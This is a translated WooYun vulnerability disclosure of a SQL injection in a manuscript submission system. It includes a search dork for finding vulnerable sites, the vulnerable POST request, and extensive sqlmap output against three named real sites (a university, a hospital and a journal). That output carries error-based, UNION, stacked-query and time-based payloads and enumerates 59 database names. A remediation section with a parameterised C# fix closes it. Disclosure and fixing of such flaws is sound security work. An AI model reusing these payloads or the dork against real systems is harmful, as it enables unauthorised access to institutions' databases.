
Vulnerability summary

Defect ID: wooyun-2014-076356

Title: Generic SQL injection vulnerability in a manuscript submission system (affects many enterprises, public institutions and schools)

Vendor: 南京杰诺瀚软件科技有限公司

Author: 路人甲

Submitted: 2014-09-18 16:42

Fix deadline: 2014-12-17 16:44

Disclosed: 2014-12-17 16:44

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Handed over to a third-party partner organization (CNCERT, 国家互联网应急中心) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2014-09-18: Details sent to the vendor, awaiting vendor handling
2014-09-23: Vendor confirmed; details disclosed to the vendor only
2014-09-26: Details opened to third-party security partners
2014-11-17: Details disclosed to core white hats and domain experts
2014-11-27: Details disclosed to regular white hats
2014-12-07: Details disclosed to intern white hats
2014-12-17: Details disclosed to the public

Brief description:

Without proof that reaches the database it doesn't get approved, huh~~ Fine, resubmitting.

Detailed description:

http://74.125.111.99/search?q=inurl:Web/CommonPage.aspx?Id=
This search turns up a lot of them. Picked a few at random to test:
POST /web/keysearch.aspx HTTP/1.1
Host: www.XXXX.com
User-Agent: Baiduspider
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: cck_lasttime=1410760097025; cck_count=0
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 95
author=1&butSearch=%e6%9f%a5%e8%af%a2&keyword=assd&Lm=2&Nian=2016&operat=&Qi=1&state=&title=wolf

Proof of vulnerability:

Case 1: 湖南大学 (Hunan University) http://dxjykx.cnmanu.cn/
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: author
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: author=1%' AND 9293=CONVERT(INT,(SELECT CHAR(58)+CHAR(109)+CHAR(105)+CHAR(112)+CHAR(58)+(SELECT (CASE WHEN (9293=9293) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(115)+CHAR(97)+CHAR(117)+CHAR(58))) AND '%'='&butSearch=??&keyword=assd&Lm=2&Nian=2016&operat=&Qi=1&state=&title=wolf
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: author=1%' UNION ALL SELECT NULL, NULL, NULL, NULL, CHAR(58)+CHAR(109)+CHAR(105)+CHAR(112)+CHAR(58)+CHAR(100)+CHAR(74)+CHAR(79)+CHAR(71)+CHAR(115)+CHAR(88)+CHAR(77)+CHAR(80)+CHAR(88)+CHAR(82)+CHAR(58)+CHAR(115)+CHAR(97)+CHAR(117)+CHAR(58), NULL-- &butSearch=??&keyword=assd&Lm=2&Nian=2016&operat=&Qi=1&state=&title=wolf
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: author=1%'; WAITFOR DELAY '0:0:5'--&butSearch=??&keyword=assd&Lm=2&Nian=2016&operat=&Qi=1&state=&title=wolf
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: author=1%' WAITFOR DELAY '0:0:5'--&butSearch=??&keyword=assd&Lm=2&Nian=2016&operat=&Qi=1&state=&title=wolf
Place: POST
Parameter: keyword
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: author=1&butSearch=??&keyword=assd%' AND 4223=CONVERT(INT,(SELECT CHAR(58)+CHAR(109)+CHAR(105)+CHAR(112)+CHAR(58)+(SELECT (CASE WHEN (4223=4223) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(115)+CHAR(97)+CHAR(117)+CHAR(58))) AND '%'='&Lm=2&Nian=2016&operat=&Qi=1&state=&title=wolf
Type: UNION query
Title: Generic UNION query (78) - 6 columns
Payload: author=1&butSearch=??&keyword=assd%' UNION ALL SELECT 78, 78, 78, 78, 78, CHAR(58)+CHAR(109)+CHAR(105)+CHAR(112)+CHAR(58)+CHAR(75)+CHAR(90)+CHAR(88)+CHAR(113)+CHAR(110)+CHAR(103)+CHAR(76)+CHAR(85)+CHAR(80)+CHAR(114)+CHAR(58)+CHAR(115)+CHAR(97)+CHAR(117)+CHAR(58)-- &Lm=2&Nian=2016&operat=&Qi=1&state=&title=wolf
Place: POST
Parameter: title
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: author=1&butSearch=??&keyword=assd&Lm=2&Nian=2016&operat=&Qi=1&state=&title=wolf%' AND 4163=CONVERT(INT,(SELECT CHAR(58)+CHAR(109)+CHAR(105)+CHAR(112)+CHAR(58)+(SELECT (CASE WHEN (4163=4163) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(115)+CHAR(97)+CHAR(117)+CHAR(58))) AND '%'='
Type: UNION query
Title: Generic UNION query (78) - 6 columns
Payload: author=1&butSearch=??&keyword=assd&Lm=2&Nian=2016&operat=&Qi=1&state=&title=wolf%' UNION ALL SELECT 78, 78, 78, 78, CHAR(58)+CHAR(109)+CHAR(105)+CHAR(112)+CHAR(58)+CHAR(108)+CHAR(97)+CHAR(79)+CHAR(74)+CHAR(71)+CHAR(110)+CHAR(69)+CHAR(116)+CHAR(108)+CHAR(82)+CHAR(58)+CHAR(115)+CHAR(97)+CHAR(117)+CHAR(58), 78--
---
there were multiple injection points, please select the one to use for following injections:
[0] place: POST, parameter: author, type: Single quoted string (default)
[1] place: POST, parameter: title, type: Single quoted string
[2] place: POST, parameter: keyword, type: Single quoted string
[q] Quit
>
[13:41:08] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
[13:41:08] [INFO] testing if current user is DBA
current user is DBA: False
[13:41:08] [INFO] fetching database names
[13:41:08] [INFO] the SQL query used returns 59 entries
available databases [59]:
[*] bl
[*] cdxxgc
[*] cg
[*] cghy
[*] cy
[*] cymx
[*] d1
[*] demcom
[*] demo
[*] dj
[*] dxjykx
[*] Eye
[*] gjzhyx
[*] GuaHao
[*] hh
[*] hhzrkx
[*] hlgl
[*] hnxbyx
[*] hxyqdz
[*] j4e
[*] jjyx
[*] lcjsyx
[*] lcjyzzs
[*] lcsjbx
[*] lcsjwk
[*] lnyxybj
[*] main
[*] master
[*] mfskin
[*] model
[*] mrzxwk
[*] msdb
[*] mz
[*] mzyfs
[*] njsd
[*] nky
[*] Northwind
[*] nxgb
[*] nydxxb
[*] pifu
[*] pubs
[*] rfic
[*] SMS
[*] st
[*] sypfb
[*] tempdb
[*] test
[*] wcbx
[*] wf
[*] wlxb
[*] xdx
[*] xhnj
[*] xjyx
[*] xnxyxb
[*] yxjz
[*] zdblx
[*] zjyx
[*] zr
[*] zxyjh
[13:41:08] [INFO] fetched data logged to text files under 'I:\????\SQLMAP~1\Bin\output\dxjykx.cnmanu.cn'
[*] shutting down at 13:41:08
Case 2: 上海交通大学医学院附属仁济医院 (Renji Hospital, Shanghai Jiao Tong University School of Medicine) http://www.cjge-manuscriptcentral.com
D:\Python27\sqlmap>sqlmap.py -r 1.txt --dbs
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[*] starting at: 13:25:16
[13:25:16] [INFO] parsing HTTP request from '1.txt'
[13:25:16] [INFO] using 'D:\Python27\sqlmap\output\www.cjge-manuscriptcentral.com\session' as session file
[13:25:16] [INFO] resuming injection data from session file
[13:25:16] [INFO] resuming back-end DBMS 'microsoft sql server 2000' from session file
[13:25:16] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: author
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: author=1'; WAITFOR DELAY '0:0:5';-- AND 'enfS'='enfS&butSearch=查询&keyword=assd&Lm=2&Nian=2016&operat=&Qi=1&state=&title=Mr.
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: author=1' WAITFOR DELAY '0:0:5'-- AND 'ExWQ'='ExWQ&butSearch=查询&keyword=assd&Lm=2&Nian=2016&operat=&Qi=1&state=&title=Mr.
---
[13:25:17] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
[13:25:17] [INFO] fetching database names
[13:25:17] [INFO] fetching number of databases
[13:25:17] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
59
[13:25:47] [INFO] retrieved:
[13:25:52] [WARNING] adjusting time delay to 1 second
bl
[13:26:33] [INFO] retrieved: cdxxgc
[13:27:12] [INFO] retrieved: cg
[13:27:25] [INFO] retrieved: cghy
[13:27:51] [INFO] retrieved: cy
[13:28:03] [INFO] retrieved: cymx
[13:28:30] [INFO] retrieved: d1
[13:28:42] [INFO] retrieved: demcom
[13:29:18] [INFO] retrieved: demo
[13:29:44] [INFO] retrieved: dj
[13:29:58] [INFO] retrieved: dxjykx
[13:30:39] [INFO] retrieved: Eye
[13:30:56] [INFO] retrieved: gjzhyx
[13:31:38] [INFO] retrieved: GuaHao
[13:32:13] [INFO] retrieved: hh
[13:32:30] [INFO] retrieved: hhzrkx
[13:33:13] [INFO] retrieved: hlgl
[13:33:43] [INFO] retrieved: hnxbyx
[13:34:26] [INFO] retrieved: hxyqdz
[13:35:07] [INFO] retrieved: j4e
[13:35:27] [INFO] retrieved: jjyx
[13:35:55] [INFO] retrieved: lcjsyx
[13:36:35] [INFO] retrieved: lcjyzzs
[13:37:23] [INFO] retrieved: lcsjbx
Didn't let it run to completion; proving that the vulnerability can retrieve database information should be enough!
Case 3: 中国美容整形外科杂志 (Chinese Journal of Aesthetic and Plastic Surgery) mr.cnmanu.cn
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: title
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: author=1&butSearch=??&keyword=assd&Lm=2&Nian=2016&operat=&Qi=1&state=&title=wolf%' AND 7683=CONVERT(INT,(SELECT CHAR(58)+CHAR(104)+CHAR(119)+CHAR(114)+CHAR(58)+(SELECT (CASE WHEN (7683=7683) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(110)+CHAR(119)+CHAR(116)+CHAR(58))) AND '%'='
Type: UNION query
Title: Generic UNION query (41) - 6 columns
Payload: author=1&butSearch=??&keyword=assd&Lm=2&Nian=2016&operat=&Qi=1&state=&title=wolf%' UNION ALL SELECT 41, 41, 41, 41, CHAR(58)+CHAR(104)+CHAR(119)+CHAR(114)+CHAR(58)+CHAR(76)+CHAR(69)+CHAR(116)+CHAR(66)+CHAR(113)+CHAR(78)+CHAR(71)+CHAR(76)+CHAR(75)+CHAR(98)+CHAR(58)+CHAR(110)+CHAR(119)+CHAR(116)+CHAR(58), 41--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: author=1&butSearch=??&keyword=assd&Lm=2&Nian=2016&operat=&Qi=1&state=&title=wolf%'; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: author=1&butSearch=??&keyword=assd&Lm=2&Nian=2016&operat=&Qi=1&state=&title=wolf%' WAITFOR DELAY '0:0:5'--
Place: POST
Parameter: keyword
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: author=1&butSearch=??&keyword=assd%' AND 2981=CONVERT(INT,(SELECT CHAR(58)+CHAR(104)+CHAR(119)+CHAR(114)+CHAR(58)+(SELECT (CASE WHEN (2981=2981) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(110)+CHAR(119)+CHAR(116)+CHAR(58))) AND '%'='&Lm=2&Nian=2016&operat=&Qi=1&state=&title=wolf
Type: UNION query
Title: Generic UNION query (41) - 6 columns
Payload: author=1&butSearch=??&keyword=assd%' UNION ALL SELECT 41, 41, 41, 41, 41, CHAR(58)+CHAR(104)+CHAR(119)+CHAR(114)+CHAR(58)+CHAR(122)+CHAR(72)+CHAR(105)+CHAR(70)+CHAR(111)+CHAR(73)+CHAR(83)+CHAR(98)+CHAR(117)+CHAR(100)+CHAR(58)+CHAR(110)+CHAR(119)+CHAR(116)+CHAR(58)-- &Lm=2&Nian=2016&operat=&Qi=1&state=&title=wolf
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: author=1&butSearch=??&keyword=assd%'; WAITFOR DELAY '0:0:5'--&Lm=2&Nian=2016&operat=&Qi=1&state=&title=wolf
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: author=1&butSearch=??&keyword=assd%' WAITFOR DELAY '0:0:5'--&Lm=2&Nian=2016&operat=&Qi=1&state=&title=wolf
Place: POST
Parameter: author
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: author=1%' AND 6529=CONVERT(INT,(SELECT CHAR(58)+CHAR(104)+CHAR(119)+CHAR(114)+CHAR(58)+(SELECT (CASE WHEN (6529=6529) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(110)+CHAR(119)+CHAR(116)+CHAR(58))) AND '%'='&butSearch=??&keyword=assd&Lm=2&Nian=2016&operat=&Qi=1&state=&title=wolf
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: author=1%' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CHAR(58)+CHAR(104)+CHAR(119)+CHAR(114)+CHAR(58)+CHAR(119)+CHAR(119)+CHAR(101)+CHAR(76)+CHAR(87)+CHAR(114)+CHAR(81)+CHAR(75)+CHAR(70)+CHAR(71)+CHAR(58)+CHAR(110)+CHAR(119)+CHAR(116)+CHAR(58)-- &butSearch=??&keyword=assd&Lm=2&Nian=2016&operat=&Qi=1&state=&title=wolf
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: author=1%'; WAITFOR DELAY '0:0:5'--&butSearch=??&keyword=assd&Lm=2&Nian=2016&operat=&Qi=1&state=&title=wolf
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: author=1%' WAITFOR DELAY '0:0:5'--&butSearch=??&keyword=assd&Lm=2&Nian=2016&operat=&Qi=1&state=&title=wolf
---
there were multiple injection points, please select the one to use for following injections:
[0] place: POST, parameter: author, type: Single quoted string (default)
[1] place: POST, parameter: title, type: Single quoted string
[2] place: POST, parameter: keyword, type: Single quoted string
[q] Quit
>
[13:40:55] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
[13:40:55] [INFO] testing if current user is DBA
current user is DBA: False
[13:40:55] [INFO] fetching database names
[13:40:55] [INFO] the SQL query used returns 59 entries
available databases [59]:
[13:40:55] [INFO] fetched data logged to text files under 'I:\????\SQLMAP~1\Bin\output\mr.cnmanu.cn'
[*] shutting down at 13:40:55
Reviewers, this should be good enough now~~~

Remediation:

Fixing the vulnerability is relatively simple: add global filtering of POST parameters.
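One way to fix this inside the application itself, as an added example that is not the vendor's code: the `%'` prefix and the trailing `'%'='` in the recorded payloads show that the author, keyword and title fields are spliced into `LIKE '%...%'` patterns, so binding them as parameters removes the injection regardless of any request-level filter. The table and column names below are assumptions.

```csharp
using System;
using System.Data;
using System.Data.SqlClient;

// Added example, not the vendor's code. The table Manuscripts and its columns
// Author, Keywords and Title are assumed names for illustration.
public static class ManuscriptSearch
{
    // Vulnerable pattern: form fields are concatenated straight into LIKE '%...%'.
    // A value like  1%' AND ... AND '%'='  closes the quoted pattern, and the
    // rest of the input is executed as SQL (the error-based, UNION and
    // WAITFOR DELAY payloads in the sqlmap output all rely on this).
    public static string BuildVulnerableSql(string author, string keyword, string title)
    {
        return "SELECT Id, Title, Author FROM Manuscripts"
             + " WHERE Author LIKE '%" + author + "%'"
             + " AND Keywords LIKE '%" + keyword + "%'"
             + " AND Title LIKE '%" + title + "%'";
    }

    // LIKE wildcards typed by the user (% _ [) are still interpreted inside a
    // bound pattern; bracket-escape them so the search matches the literal text.
    private static string EscapeLike(string s)
    {
        return s.Replace("[", "[[]").Replace("%", "[%]").Replace("_", "[_]");
    }

    // Fixed: the SQL text is constant and every user value is a typed parameter.
    // The wildcards are added to the parameter value, not to the SQL, so quotes,
    // semicolons and WAITFOR in the input are only data to the server.
    public static DataTable Search(SqlConnection conn, string author, string keyword, string title)
    {
        const string sql =
            "SELECT Id, Title, Author FROM Manuscripts"
          + " WHERE Author LIKE @author AND Keywords LIKE @keyword AND Title LIKE @title";
        using (SqlCommand cmd = new SqlCommand(sql, conn))
        {
            cmd.Parameters.Add("@author", SqlDbType.NVarChar, 200).Value = "%" + EscapeLike(author) + "%";
            cmd.Parameters.Add("@keyword", SqlDbType.NVarChar, 200).Value = "%" + EscapeLike(keyword) + "%";
            cmd.Parameters.Add("@title", SqlDbType.NVarChar, 200).Value = "%" + EscapeLike(title) + "%";
            DataTable table = new DataTable();
            using (SqlDataReader reader = cmd.ExecuteReader())
            {
                table.Load(reader);
            }
            return table;
        }
    }
}
```

The same parameterised form applies to the other search fields (Lm, Nian, Qi, state) if they reach SQL; a global POST filter is at best a second layer in front of this.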

Copyright notice: when reposting, please credit the source: 路人甲@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 15

Confirmed: 2014-09-23 08:40

Vendor reply:

Latest status:

None yet